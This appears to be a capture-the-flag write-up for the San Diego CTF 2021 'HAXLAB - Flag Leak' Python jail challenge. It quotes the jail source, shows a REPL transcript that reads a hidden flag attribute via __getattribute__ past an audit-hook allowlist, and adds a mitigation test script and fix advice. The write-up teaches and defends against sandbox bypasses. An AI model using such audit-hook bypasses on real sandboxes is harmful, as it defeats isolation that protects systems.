San Diego CTF 2021: HAXLAB - Flag Leak

HAXLAB - Flag Leak

Category: PWN


MEDIUM

Welcome to HAXLAB, the world’s most secure MaaS® (math-as-a-service) with advanced functionality.

Note

For this part of the challenge, please submit the contents of flag1.txt.

jail.py

https://cdn.discordapp.com/attachments/840074210935177247/840076657075159040/jail.py

Connect via

nc haxlab.sdc.tf 1337

jail.py

#! /usr/bin/env python3
# flag2.txt and proprietary.py are in the working directory of the script in the hosted version
import sys
import proprietary # Our secure proprietary flag hider for flag1.txt

PROMPT = '>>> '

# Old Python versions are too vulnerable to exploits
if sys.version_info[:3] < (3, 8, 5):
    print("Sorry, your Python interpreter version is below the minimum system requirement to run HAXLAB.")
    sys.exit(1)

def audit_hook(event, _):
    # These are the only necessary events for this Math REPL to work
    ALLOWED_EVENTS = set({'builtins.input', 'builtins.input/result', 'exec', 'compile'})
    if event not in ALLOWED_EVENTS:
        # Thou shalt not hack!
        raise RuntimeError('Operation not permitted: {}'.format(event))

flag1 = proprietary.get_flag1()

def repl():
    global_dict = dict()
    global_dict['flag1'] = flag1
    while True:
        try:
            src = input(PROMPT)
        except EOFError:
            print() # print newline
            break
        except KeyboardInterrupt:
            print('canceled')
            continue
        if src == '': # Skip empty lines
            continue
        try:
            code = compile(src, '<string>', 'single')
        except SyntaxError as e:
            print(e)
            continue
        try:
            exec(code, global_dict)
        except Exception as e:
            print(e)

print('======= HAXLAB - An advanced yet secure calculator =======\nPowered by Python ' + sys.version)
# You will never trigger these hooks if all you do is Math :)
sys.addaudithook(audit_hook)
del sys
try:
    # Enter the HAXLAB shell for the user to do Math
    repl()
except Exception as e:
    print(e)

Solution

The transcript below is largely self-explanatory. dir() shows that flag1 sits in the REPL's globals, and dir(flag1) reveals that the holder keeps the flag under the attribute name '-flag1-', which is not a valid Python identifier and therefore cannot be reached with dot syntax; __getattribute__ accepts any string, though. The audit hook never fires, since attribute access raises no audit event. The final [:-1] drops one trailing character, presumably the newline read from flag1.txt.

>>> exec("print(dir())")
['__builtins__', 'flag1']
>>> print(flag1)
<proprietary.Flag1Holder object at 0x7fec38c32a3
>>> print(dir(flag1))
['-flag1-', '__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__']
>>> print(flag1.__getattribute__('-flag1-'))
REDACTED
>>> print(flag1.__getattribute__('-flag1-')[:-1])
sdctf{get@ttr_r3ads_3v3ryth1ng}
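The point of the transcript, as an added example that is not part of the original write-up: the jail's audit-hook allowlist blocks I/O-style events such as open(), but attribute access raises no audit event at all, so anything reachable from the REPL's globals can be read with __getattribute__. The script reproduces the hook in a child interpreter and compares jail.py's namespace with a mitigated one that never puts the holder in scope; Flag1Holder is an assumed stand-in for the unpublished proprietary class, and the flag value is constructed.

```python
import subprocess
import sys
import textwrap

# Run in a child interpreter: a hook from sys.addaudithook() is process-wide
# and cannot be removed. proprietary.py is not public, so Flag1Holder is a
# stand-in (assumption) with the secret under the non-identifier attribute
# name '-flag1-' that dir(flag1) revealed; the flag text is constructed.
CHILD = textwrap.dedent("""
    import sys
    ALLOWED_EVENTS = {'builtins.input', 'builtins.input/result', 'exec', 'compile'}
    def audit_hook(event, _):
        if event not in ALLOWED_EVENTS:
            raise RuntimeError('Operation not permitted: {}'.format(event))
    class Flag1Holder:
        pass
    holder = Flag1Holder()
    setattr(holder, '-flag1-', 'sdctf{constructed_sample}\\n')
    # argv[2] == '1' reproduces jail.py (flag1 in the REPL globals);
    # '0' is the mitigated REPL that never puts the holder in scope.
    global_dict = {'flag1': holder} if sys.argv[2] == '1' else {}
    sys.addaudithook(audit_hook)
    try:
        exec(compile(sys.argv[1], '<string>', 'exec'), global_dict)
        print('VERDICT ALLOWED')
    except RuntimeError as e:
        print('VERDICT BLOCKED' if 'not permitted' in str(e) else 'VERDICT ERROR')
    except Exception:
        print('VERDICT ERROR')
""")

def run_in_jail(src, expose_flag=True):
    """Run one REPL line under the reproduced hook and return 'ALLOWED'
    (no disallowed audit event), 'BLOCKED' (the hook fired) or 'ERROR'."""
    proc = subprocess.run(
        [sys.executable, "-c", CHILD, src, "1" if expose_flag else "0"],
        capture_output=True, text=True, timeout=30)
    for line in proc.stdout.splitlines():
        if line.startswith("VERDICT "):
            return line[len("VERDICT "):]
    return "ERROR"

if __name__ == "__main__":
    for src in ("open('flag1.txt')", "print(dir())",
                "print(flag1.__getattribute__('-flag1-'))"):
        print(f"{src:45} jail={run_in_jail(src)} "
              f"mitigated={run_in_jail(src, expose_flag=False)}")
```

Keeping flag1 out of global_dict only closes the by-name path; a secret loaded into the sandboxed interpreter stays reachable with enough introspection, so the robust fix is to keep flag1.txt out of the jailed process entirely.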


Flag

sdctf{get@ttr_r3ads_3v3ryth1ng}

luc © 2021